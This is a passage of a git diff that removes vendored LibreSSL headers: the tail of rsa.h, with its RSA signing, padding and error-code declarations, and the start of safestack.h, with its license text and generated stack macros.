-RSA *d2i_RSA_NET(RSA **a, const unsigned char **pp, long length,
-    int (*cb)(char *buf, int len, const char *prompt, int verify), int sgckey);
-
-int i2d_Netscape_RSA(const RSA *a, unsigned char **pp,
-    int (*cb)(char *buf, int len, const char *prompt, int verify));
-RSA *d2i_Netscape_RSA(RSA **a, const unsigned char **pp, long length,
-    int (*cb)(char *buf, int len, const char *prompt, int verify));
-#endif
-
-/* The following 2 functions sign and verify a X509_SIG ASN1 object
- * inside PKCS#1 padded RSA encryption */
-int RSA_sign(int type, const unsigned char *m, unsigned int m_length,
-    unsigned char *sigret, unsigned int *siglen, RSA *rsa);
-int RSA_verify(int type, const unsigned char *m, unsigned int m_length,
-    const unsigned char *sigbuf, unsigned int siglen, RSA *rsa);
-
-/* The following 2 function sign and verify a ASN1_OCTET_STRING
- * object inside PKCS#1 padded RSA encryption */
-int RSA_sign_ASN1_OCTET_STRING(int type, const unsigned char *m,
-    unsigned int m_length, unsigned char *sigret, unsigned int *siglen,
-    RSA *rsa);
-int RSA_verify_ASN1_OCTET_STRING(int type, const unsigned char *m,
-    unsigned int m_length, unsigned char *sigbuf, unsigned int siglen,
-    RSA *rsa);
-
-int RSA_blinding_on(RSA *rsa, BN_CTX *ctx);
-void RSA_blinding_off(RSA *rsa);
-BN_BLINDING *RSA_setup_blinding(RSA *rsa, BN_CTX *ctx);
-
-int RSA_padding_add_PKCS1_type_1(unsigned char *to, int tlen,
-    const unsigned char *f, int fl);
-int RSA_padding_check_PKCS1_type_1(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len);
-int RSA_padding_add_PKCS1_type_2(unsigned char *to, int tlen,
-    const unsigned char *f, int fl);
-int RSA_padding_check_PKCS1_type_2(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len);
-int PKCS1_MGF1(unsigned char *mask, long len,
-    const unsigned char *seed, long seedlen, const EVP_MD *dgst);
-int RSA_padding_add_PKCS1_OAEP(unsigned char *to, int tlen,
-    const unsigned char *f, int fl,
-    const unsigned char *p, int pl);
-int RSA_padding_check_PKCS1_OAEP(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len,
-    const unsigned char *p, int pl);
-int RSA_padding_add_none(unsigned char *to, int tlen,
-    const unsigned char *f, int fl);
-int RSA_padding_check_none(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len);
-int RSA_padding_add_X931(unsigned char *to, int tlen,
-    const unsigned char *f, int fl);
-int RSA_padding_check_X931(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len);
-int RSA_X931_hash_id(int nid);
-
-int RSA_verify_PKCS1_PSS(RSA *rsa, const unsigned char *mHash,
-    const EVP_MD *Hash, const unsigned char *EM, int sLen);
-int RSA_padding_add_PKCS1_PSS(RSA *rsa, unsigned char *EM,
-    const unsigned char *mHash, const EVP_MD *Hash, int sLen);
-
-int RSA_verify_PKCS1_PSS_mgf1(RSA *rsa, const unsigned char *mHash,
-    const EVP_MD *Hash, const EVP_MD *mgf1Hash, const unsigned char *EM,
-    int sLen);
-
-int RSA_padding_add_PKCS1_PSS_mgf1(RSA *rsa, unsigned char *EM,
-    const unsigned char *mHash, const EVP_MD *Hash, const EVP_MD *mgf1Hash,
-    int sLen);
-
-int RSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int RSA_set_ex_data(RSA *r, int idx, void *arg);
-void *RSA_get_ex_data(const RSA *r, int idx);
-
-RSA *RSAPublicKey_dup(RSA *rsa);
-RSA *RSAPrivateKey_dup(RSA *rsa);
-
-/* If this flag is set the RSA method is FIPS compliant and can be used
- * in FIPS mode. This is set in the validated module method. If an
- * application sets this flag in its own methods it is its responsibility
- * to ensure the result is compliant.
- */
-
-#define RSA_FLAG_FIPS_METHOD			0x0400
-
-/* If this flag is set the operations normally disabled in FIPS mode are
- * permitted it is then the applications responsibility to ensure that the
- * usage is compliant.
- */
-
-#define RSA_FLAG_NON_FIPS_ALLOW			0x0400
-/* Application has decided PRNG is good enough to generate a key: don't
- * check.
- */
-#define RSA_FLAG_CHECKED			0x0800
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_RSA_strings(void);
-
-/* Error codes for the RSA functions. */
-
-/* Function codes. */
-#define RSA_F_CHECK_PADDING_MD				 140
-#define RSA_F_DO_RSA_PRINT				 146
-#define RSA_F_INT_RSA_VERIFY				 145
-#define RSA_F_MEMORY_LOCK				 100
-#define RSA_F_OLD_RSA_PRIV_DECODE			 147
-#define RSA_F_PKEY_RSA_CTRL				 143
-#define RSA_F_PKEY_RSA_CTRL_STR				 144
-#define RSA_F_PKEY_RSA_SIGN				 142
-#define RSA_F_PKEY_RSA_VERIFY				 154
-#define RSA_F_PKEY_RSA_VERIFYRECOVER			 141
-#define RSA_F_RSA_BUILTIN_KEYGEN			 129
-#define RSA_F_RSA_CHECK_KEY				 123
-#define RSA_F_RSA_EAY_MOD_EXP				 157
-#define RSA_F_RSA_EAY_PRIVATE_DECRYPT			 101
-#define RSA_F_RSA_EAY_PRIVATE_ENCRYPT			 102
-#define RSA_F_RSA_EAY_PUBLIC_DECRYPT			 103
-#define RSA_F_RSA_EAY_PUBLIC_ENCRYPT			 104
-#define RSA_F_RSA_GENERATE_KEY				 105
-#define RSA_F_RSA_GENERATE_KEY_EX			 155
-#define RSA_F_RSA_ITEM_VERIFY				 156
-#define RSA_F_RSA_MEMORY_LOCK				 130
-#define RSA_F_RSA_NEW_METHOD				 106
-#define RSA_F_RSA_NULL					 124
-#define RSA_F_RSA_NULL_MOD_EXP				 131
-#define RSA_F_RSA_NULL_PRIVATE_DECRYPT			 132
-#define RSA_F_RSA_NULL_PRIVATE_ENCRYPT			 133
-#define RSA_F_RSA_NULL_PUBLIC_DECRYPT			 134
-#define RSA_F_RSA_NULL_PUBLIC_ENCRYPT			 135
-#define RSA_F_RSA_PADDING_ADD_NONE			 107
-#define RSA_F_RSA_PADDING_ADD_PKCS1_OAEP		 121
-#define RSA_F_RSA_PADDING_ADD_PKCS1_PSS			 125
-#define RSA_F_RSA_PADDING_ADD_PKCS1_PSS_MGF1		 148
-#define RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_1		 108
-#define RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_2		 109
-#define RSA_F_RSA_PADDING_ADD_X931			 127
-#define RSA_F_RSA_PADDING_CHECK_NONE			 111
-#define RSA_F_RSA_PADDING_CHECK_PKCS1_OAEP		 122
-#define RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_1		 112
-#define RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_2		 113
-#define RSA_F_RSA_PADDING_CHECK_X931			 128
-#define RSA_F_RSA_PRINT					 115
-#define RSA_F_RSA_PRINT_FP				 116
-#define RSA_F_RSA_PRIVATE_DECRYPT			 150
-#define RSA_F_RSA_PRIVATE_ENCRYPT			 151
-#define RSA_F_RSA_PRIV_DECODE				 137
-#define RSA_F_RSA_PRIV_ENCODE				 138
-#define RSA_F_RSA_PUBLIC_DECRYPT			 152
-#define RSA_F_RSA_PUBLIC_ENCRYPT			 153
-#define RSA_F_RSA_PUB_DECODE				 139
-#define RSA_F_RSA_SETUP_BLINDING			 136
-#define RSA_F_RSA_SIGN					 117
-#define RSA_F_RSA_SIGN_ASN1_OCTET_STRING		 118
-#define RSA_F_RSA_VERIFY				 119
-#define RSA_F_RSA_VERIFY_ASN1_OCTET_STRING		 120
-#define RSA_F_RSA_VERIFY_PKCS1_PSS			 126
-#define RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1			 149
-
-/* Reason codes. */
-#define RSA_R_ALGORITHM_MISMATCH			 100
-#define RSA_R_BAD_E_VALUE				 101
-#define RSA_R_BAD_FIXED_HEADER_DECRYPT			 102
-#define RSA_R_BAD_PAD_BYTE_COUNT			 103
-#define RSA_R_BAD_SIGNATURE				 104
-#define RSA_R_BLOCK_TYPE_IS_NOT_01			 106
-#define RSA_R_BLOCK_TYPE_IS_NOT_02			 107
-#define RSA_R_DATA_GREATER_THAN_MOD_LEN			 108
-#define RSA_R_DATA_TOO_LARGE				 109
-#define RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE		 110
-#define RSA_R_DATA_TOO_LARGE_FOR_MODULUS		 132
-#define RSA_R_DATA_TOO_SMALL				 111
-#define RSA_R_DATA_TOO_SMALL_FOR_KEY_SIZE		 122
-#define RSA_R_DIGEST_TOO_BIG_FOR_RSA_KEY		 112
-#define RSA_R_DMP1_NOT_CONGRUENT_TO_D			 124
-#define RSA_R_DMQ1_NOT_CONGRUENT_TO_D			 125
-#define RSA_R_D_E_NOT_CONGRUENT_TO_1			 123
-#define RSA_R_FIRST_OCTET_INVALID			 133
-#define RSA_R_ILLEGAL_OR_UNSUPPORTED_PADDING_MODE	 144
-#define RSA_R_INVALID_DIGEST_LENGTH			 143
-#define RSA_R_INVALID_HEADER				 137
-#define RSA_R_INVALID_KEYBITS				 145
-#define RSA_R_INVALID_MESSAGE_LENGTH			 131
-#define RSA_R_INVALID_MGF1_MD				 156
-#define RSA_R_INVALID_PADDING				 138
-#define RSA_R_INVALID_PADDING_MODE			 141
-#define RSA_R_INVALID_PSS_PARAMETERS			 149
-#define RSA_R_INVALID_PSS_SALTLEN			 146
-#define RSA_R_INVALID_SALT_LENGTH			 150
-#define RSA_R_INVALID_TRAILER				 139
-#define RSA_R_INVALID_X931_DIGEST			 142
-#define RSA_R_IQMP_NOT_INVERSE_OF_Q			 126
-#define RSA_R_KEY_SIZE_TOO_SMALL			 120
-#define RSA_R_LAST_OCTET_INVALID			 134
-#define RSA_R_MODULUS_TOO_LARGE				 105
-#define RSA_R_NON_FIPS_RSA_METHOD			 157
-#define RSA_R_NO_PUBLIC_EXPONENT			 140
-#define RSA_R_NULL_BEFORE_BLOCK_MISSING			 113
-#define RSA_R_N_DOES_NOT_EQUAL_P_Q			 127
-#define RSA_R_OAEP_DECODING_ERROR			 121
-#define RSA_R_OPERATION_NOT_ALLOWED_IN_FIPS_MODE	 158
-#define RSA_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE	 148
-#define RSA_R_PADDING_CHECK_FAILED			 114
-#define RSA_R_P_NOT_PRIME				 128
-#define RSA_R_Q_NOT_PRIME				 129
-#define RSA_R_RSA_OPERATIONS_NOT_SUPPORTED		 130
-#define RSA_R_SLEN_CHECK_FAILED				 136
-#define RSA_R_SLEN_RECOVERY_FAILED			 135
-#define RSA_R_SSLV3_ROLLBACK_ATTACK			 115
-#define RSA_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD 116
-#define RSA_R_UNKNOWN_ALGORITHM_TYPE			 117
-#define RSA_R_UNKNOWN_MASK_DIGEST			 151
-#define RSA_R_UNKNOWN_PADDING_TYPE			 118
-#define RSA_R_UNKNOWN_PSS_DIGEST			 152
-#define RSA_R_UNSUPPORTED_MASK_ALGORITHM		 153
-#define RSA_R_UNSUPPORTED_MASK_PARAMETER		 154
-#define RSA_R_UNSUPPORTED_SIGNATURE_TYPE		 155
-#define RSA_R_VALUE_MISSING				 147
-#define RSA_R_WRONG_SIGNATURE_LENGTH			 119
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/safestack.h b/thirdparty/libressl/include/openssl/safestack.h
deleted file mode 100644
index 6540174..0000000
--- a/thirdparty/libressl/include/openssl/safestack.h
+++ /dev/null
@@ -1,2667 +0,0 @@
-/* $OpenBSD: safestack.h,v 1.15 2016/12/27 16:02:40 jsing Exp $ */
-/* ====================================================================
- * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_SAFESTACK_H
-#define HEADER_SAFESTACK_H
-
-#include <openssl/stack.h>
-
-#ifndef CHECKED_PTR_OF
-#define CHECKED_PTR_OF(type, p) \
-    ((void*) (1 ? p : (type*)0))
-#endif
-
-/* In C++ we get problems because an explicit cast is needed from (void *)
- * we use CHECKED_STACK_OF to ensure the correct type is passed in the macros
- * below. 
- */
-
-#define CHECKED_STACK_OF(type, p) \
-    ((_STACK*) (1 ? p : (STACK_OF(type)*)0))
-
-#define CHECKED_SK_FREE_FUNC(type, p) \
-    ((void (*)(void *)) ((1 ? p : (void (*)(type *))0)))
-
-#define CHECKED_SK_FREE_FUNC2(type, p) \
-    ((void (*)(void *)) ((1 ? p : (void (*)(type))0)))
-
-#define CHECKED_SK_CMP_FUNC(type, p) \
-    ((int (*)(const void *, const void *)) \
-	((1 ? p : (int (*)(const type * const *, const type * const *))0)))
-
-#define STACK_OF(type) struct stack_st_##type
-#define PREDECLARE_STACK_OF(type) STACK_OF(type);
-
-#define DECLARE_STACK_OF(type) \
-STACK_OF(type) \
-    { \
-    _STACK stack; \
-    };
-#define DECLARE_SPECIAL_STACK_OF(type, type2) \
-STACK_OF(type) \
-    { \
-    _STACK stack; \
-    };
-
-#define IMPLEMENT_STACK_OF(type) /* nada (obsolete in new safestack approach)*/
-
-
-/* Strings are special: normally an lhash entry will point to a single
- * (somewhat) mutable object. In the case of strings:
- *
- * a) Instead of a single char, there is an array of chars, NUL-terminated.
- * b) The string may have be immutable.
- *
- * So, they need their own declarations. Especially important for
- * type-checking tools, such as Deputy.
- *
-o * In practice, however, it appears to be hard to have a const
- * string. For now, I'm settling for dealing with the fact it is a
- * string at all.
- */
-typedef char *OPENSSL_STRING;
-
-typedef const char *OPENSSL_CSTRING;
-
-/* Confusingly, LHASH_OF(STRING) deals with char ** throughout, but
- * STACK_OF(STRING) is really more like STACK_OF(char), only, as
- * mentioned above, instead of a single char each entry is a
- * NUL-terminated array of chars. So, we have to implement STRING
- * specially for STACK_OF. This is dealt with in the autogenerated
- * macros below.
- */
-
-DECLARE_SPECIAL_STACK_OF(OPENSSL_STRING, char)
-
-/* Similarly, we sometimes use a block of characters, NOT
- * nul-terminated. These should also be distinguished from "normal"
- * stacks. */
-
-typedef void *OPENSSL_BLOCK;
-DECLARE_SPECIAL_STACK_OF(OPENSSL_BLOCK, void)
-
-/* SKM_sk_... stack macros are internal to safestack.h:
- * never use them directly, use sk_<type>_... instead */
-#define SKM_sk_new(type, cmp) \
-	((STACK_OF(type) *)sk_new(CHECKED_SK_CMP_FUNC(type, cmp)))
-#define SKM_sk_new_null(type) \
-	((STACK_OF(type) *)sk_new_null())
-#define SKM_sk_free(type, st) \
-	sk_free(CHECKED_STACK_OF(type, st))
-#define SKM_sk_num(type, st) \
-	sk_num(CHECKED_STACK_OF(type, st))
-#define SKM_sk_value(type, st,i) \
-	((type *)sk_value(CHECKED_STACK_OF(type, st), i))
-#define SKM_sk_set(type, st,i,val) \
-	sk_set(CHECKED_STACK_OF(type, st), i, CHECKED_PTR_OF(type, val))
-#define SKM_sk_zero(type, st) \
-	sk_zero(CHECKED_STACK_OF(type, st))
-#define SKM_sk_push(type, st, val) \
-	sk_push(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val))
-#define SKM_sk_unshift(type, st, val) \
-	sk_unshift(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val))
-#define SKM_sk_find(type, st, val) \
-	sk_find(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val))
-#define SKM_sk_find_ex(type, st, val) \
-	sk_find_ex(CHECKED_STACK_OF(type, st), \
-		   CHECKED_PTR_OF(type, val))
-#define SKM_sk_delete(type, st, i) \
-	(type *)sk_delete(CHECKED_STACK_OF(type, st), i)
-#define SKM_sk_delete_ptr(type, st, ptr) \
-	(type *)sk_delete_ptr(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, ptr))
-#define SKM_sk_insert(type, st,val, i) \
-	sk_insert(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val), i)
-#define SKM_sk_set_cmp_func(type, st, cmp) \
-	((int (*)(const type * const *,const type * const *)) \
-	sk_set_cmp_func(CHECKED_STACK_OF(type, st), CHECKED_SK_CMP_FUNC(type, cmp)))
-#define SKM_sk_dup(type, st) \
-	(STACK_OF(type) *)sk_dup(CHECKED_STACK_OF(type, st))
-#define SKM_sk_pop_free(type, st, free_func) \
-	sk_pop_free(CHECKED_STACK_OF(type, st), CHECKED_SK_FREE_FUNC(type, free_func))
-#define SKM_sk_shift(type, st) \
-	(type *)sk_shift(CHECKED_STACK_OF(type, st))
-#define SKM_sk_pop(type, st) \
-	(type *)sk_pop(CHECKED_STACK_OF(type, st))
-#define SKM_sk_sort(type, st) \
-	sk_sort(CHECKED_STACK_OF(type, st))
-#define SKM_sk_is_sorted(type, st) \
-	sk_is_sorted(CHECKED_STACK_OF(type, st))
-
-#ifndef LIBRESSL_INTERNAL
-#define	SKM_ASN1_SET_OF_d2i(type, st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-  (STACK_OF(type) *)d2i_ASN1_SET( \
-				(STACK_OF(OPENSSL_BLOCK) **)CHECKED_PTR_OF(STACK_OF(type)*, st), \
-				pp, length, \
-				CHECKED_D2I_OF(type, d2i_func), \
-				CHECKED_SK_FREE_FUNC(type, free_func), \
-				ex_tag, ex_class)
-
-#define	SKM_ASN1_SET_OF_i2d(type, st, pp, i2d_func, ex_tag, ex_class, is_set) \
-  i2d_ASN1_SET((STACK_OF(OPENSSL_BLOCK) *)CHECKED_STACK_OF(type, st), pp, \
-				CHECKED_I2D_OF(type, i2d_func), \
-				ex_tag, ex_class, is_set)
-
-#define	SKM_ASN1_seq_pack(type, st, i2d_func, buf, len) \
-	ASN1_seq_pack(CHECKED_PTR_OF(STACK_OF(type), st), \
-			CHECKED_I2D_OF(type, i2d_func), buf, len)
-
-#define	SKM_ASN1_seq_unpack(type, buf, len, d2i_func, free_func) \
-	(STACK_OF(type) *)ASN1_seq_unpack(buf, len, CHECKED_D2I_OF(type, d2i_func), CHECKED_SK_FREE_FUNC(type, free_func))
-
-#define SKM_PKCS12_decrypt_d2i(type, algor, d2i_func, free_func, pass, passlen, oct, seq) \
-	(STACK_OF(type) *)PKCS12_decrypt_d2i(algor, \
-				CHECKED_D2I_OF(type, d2i_func), \
-				CHECKED_SK_FREE_FUNC(type, free_func), \
-				pass, passlen, oct, seq)
-#endif
-
-/* This block of defines is updated by util/mkstack.pl, please do not touch! */
-#define sk_ACCESS_DESCRIPTION_new(cmp) SKM_sk_new(ACCESS_DESCRIPTION, (cmp))
-#define sk_ACCESS_DESCRIPTION_new_null() SKM_sk_new_null(ACCESS_DESCRIPTION)
-#define sk_ACCESS_DESCRIPTION_free(st) SKM_sk_free(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_num(st) SKM_sk_num(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_value(st, i) SKM_sk_value(ACCESS_DESCRIPTION, (st), (i))
-#define sk_ACCESS_DESCRIPTION_set(st, i, val) SKM_sk_set(ACCESS_DESCRIPTION, (st), (i), (val))
-#define sk_ACCESS_DESCRIPTION_zero(st) SKM_sk_zero(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_push(st, val) SKM_sk_push(ACCESS_DESCRIPTION, (st), (val))
-#define sk_ACCESS_DESCRIPTION_unshift(st, val) SKM_sk_unshift(ACCESS_DESCRIPTION, (st), (val))
-#define sk_ACCESS_DESCRIPTION_find(st, val) SKM_sk_find(ACCESS_DESCRIPTION, (st), (val))
-#define sk_ACCESS_DESCRIPTION_find_ex(st, val) SKM_sk_find_ex(ACCESS_DESCRIPTION, (st), (val))
-#define sk_ACCESS_DESCRIPTION_delete(st, i) SKM_sk_delete(ACCESS_DESCRIPTION, (st), (i))
-#define sk_ACCESS_DESCRIPTION_delete_ptr(st, ptr) SKM_sk_delete_ptr(ACCESS_DESCRIPTION, (st), (ptr))
-#define sk_ACCESS_DESCRIPTION_insert(st, val, i) SKM_sk_insert(ACCESS_DESCRIPTION, (st), (val), (i))
-#define sk_ACCESS_DESCRIPTION_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ACCESS_DESCRIPTION, (st), (cmp))
-#define sk_ACCESS_DESCRIPTION_dup(st) SKM_sk_dup(ACCESS_DESCRIPTION, st)
-#define sk_ACCESS_DESCRIPTION_pop_free(st, free_func) SKM_sk_pop_free(ACCESS_DESCRIPTION, (st), (free_func))
-#define sk_ACCESS_DESCRIPTION_shift(st) SKM_sk_shift(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_pop(st) SKM_sk_pop(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_sort(st) SKM_sk_sort(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_is_sorted(st) SKM_sk_is_sorted(ACCESS_DESCRIPTION, (st))
-
-#define sk_ASIdOrRange_new(cmp) SKM_sk_new(ASIdOrRange, (cmp))
-#define sk_ASIdOrRange_new_null() SKM_sk_new_null(ASIdOrRange)
-#define sk_ASIdOrRange_free(st) SKM_sk_free(ASIdOrRange, (st))
-#define sk_ASIdOrRange_num(st) SKM_sk_num(ASIdOrRange, (st))
-#define sk_ASIdOrRange_value(st, i) SKM_sk_value(ASIdOrRange, (st), (i))
-#define sk_ASIdOrRange_set(st, i, val) SKM_sk_set(ASIdOrRange, (st), (i), (val))
-#define sk_ASIdOrRange_zero(st) SKM_sk_zero(ASIdOrRange, (st))
-#define sk_ASIdOrRange_push(st, val) SKM_sk_push(ASIdOrRange, (st), (val))
-#define sk_ASIdOrRange_unshift(st, val) SKM_sk_unshift(ASIdOrRange, (st), (val))
-#define sk_ASIdOrRange_find(st, val) SKM_sk_find(ASIdOrRange, (st), (val))
-#define sk_ASIdOrRange_find_ex(st, val) SKM_sk_find_ex(ASIdOrRange, (st), (val))
-#define sk_ASIdOrRange_delete(st, i) SKM_sk_delete(ASIdOrRange, (st), (i))
-#define sk_ASIdOrRange_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASIdOrRange, (st), (ptr))
-#define sk_ASIdOrRange_insert(st, val, i) SKM_sk_insert(ASIdOrRange, (st), (val), (i))
-#define sk_ASIdOrRange_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASIdOrRange, (st), (cmp))
-#define sk_ASIdOrRange_dup(st) SKM_sk_dup(ASIdOrRange, st)
-#define sk_ASIdOrRange_pop_free(st, free_func) SKM_sk_pop_free(ASIdOrRange, (st), (free_func))
-#define sk_ASIdOrRange_shift(st) SKM_sk_shift(ASIdOrRange, (st))
-#define sk_ASIdOrRange_pop(st) SKM_sk_pop(ASIdOrRange, (st))
-#define sk_ASIdOrRange_sort(st) SKM_sk_sort(ASIdOrRange, (st))
-#define sk_ASIdOrRange_is_sorted(st) SKM_sk_is_sorted(ASIdOrRange, (st))
-
-#define sk_ASN1_GENERALSTRING_new(cmp) SKM_sk_new(ASN1_GENERALSTRING, (cmp))
-#define sk_ASN1_GENERALSTRING_new_null() SKM_sk_new_null(ASN1_GENERALSTRING)
-#define sk_ASN1_GENERALSTRING_free(st) SKM_sk_free(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_num(st) SKM_sk_num(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_value(st, i) SKM_sk_value(ASN1_GENERALSTRING, (st), (i))
-#define sk_ASN1_GENERALSTRING_set(st, i, val) SKM_sk_set(ASN1_GENERALSTRING, (st), (i), (val))
-#define sk_ASN1_GENERALSTRING_zero(st) SKM_sk_zero(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_push(st, val) SKM_sk_push(ASN1_GENERALSTRING, (st), (val))
-#define sk_ASN1_GENERALSTRING_unshift(st, val) SKM_sk_unshift(ASN1_GENERALSTRING, (st), (val))
-#define sk_ASN1_GENERALSTRING_find(st, val) SKM_sk_find(ASN1_GENERALSTRING, (st), (val))
-#define sk_ASN1_GENERALSTRING_find_ex(st, val) SKM_sk_find_ex(ASN1_GENERALSTRING, (st), (val))
-#define sk_ASN1_GENERALSTRING_delete(st, i) SKM_sk_delete(ASN1_GENERALSTRING, (st), (i))
-#define sk_ASN1_GENERALSTRING_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_GENERALSTRING, (st), (ptr))
-#define sk_ASN1_GENERALSTRING_insert(st, val, i) SKM_sk_insert(ASN1_GENERALSTRING, (st), (val), (i))
-#define sk_ASN1_GENERALSTRING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_GENERALSTRING, (st), (cmp))
-#define sk_ASN1_GENERALSTRING_dup(st) SKM_sk_dup(ASN1_GENERALSTRING, st)
-#define sk_ASN1_GENERALSTRING_pop_free(st, free_func) SKM_sk_pop_free(ASN1_GENERALSTRING, (st), (free_func))
-#define sk_ASN1_GENERALSTRING_shift(st) SKM_sk_shift(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_pop(st) SKM_sk_pop(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_sort(st) SKM_sk_sort(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_is_sorted(st) SKM_sk_is_sorted(ASN1_GENERALSTRING, (st))
-
-#define sk_ASN1_INTEGER_new(cmp) SKM_sk_new(ASN1_INTEGER, (cmp))
-#define sk_ASN1_INTEGER_new_null() SKM_sk_new_null(ASN1_INTEGER)
-#define sk_ASN1_INTEGER_free(st) SKM_sk_free(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_num(st) SKM_sk_num(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_value(st, i) SKM_sk_value(ASN1_INTEGER, (st), (i))
-#define sk_ASN1_INTEGER_set(st, i, val) SKM_sk_set(ASN1_INTEGER, (st), (i), (val))
-#define sk_ASN1_INTEGER_zero(st) SKM_sk_zero(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_push(st, val) SKM_sk_push(ASN1_INTEGER, (st), (val))
-#define sk_ASN1_INTEGER_unshift(st, val) SKM_sk_unshift(ASN1_INTEGER, (st), (val))
-#define sk_ASN1_INTEGER_find(st, val) SKM_sk_find(ASN1_INTEGER, (st), (val))
-#define sk_ASN1_INTEGER_find_ex(st, val) SKM_sk_find_ex(ASN1_INTEGER, (st), (val))
-#define sk_ASN1_INTEGER_delete(st, i) SKM_sk_delete(ASN1_INTEGER, (st), (i))
-#define sk_ASN1_INTEGER_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_INTEGER, (st), (ptr))
-#define sk_ASN1_INTEGER_insert(st, val, i) SKM_sk_insert(ASN1_INTEGER, (st), (val), (i))
-#define sk_ASN1_INTEGER_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_INTEGER, (st), (cmp))
-#define sk_ASN1_INTEGER_dup(st) SKM_sk_dup(ASN1_INTEGER, st)
-#define sk_ASN1_INTEGER_pop_free(st, free_func) SKM_sk_pop_free(ASN1_INTEGER, (st), (free_func))
-#define sk_ASN1_INTEGER_shift(st) SKM_sk_shift(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_pop(st) SKM_sk_pop(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_sort(st) SKM_sk_sort(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_is_sorted(st) SKM_sk_is_sorted(ASN1_INTEGER, (st))
-
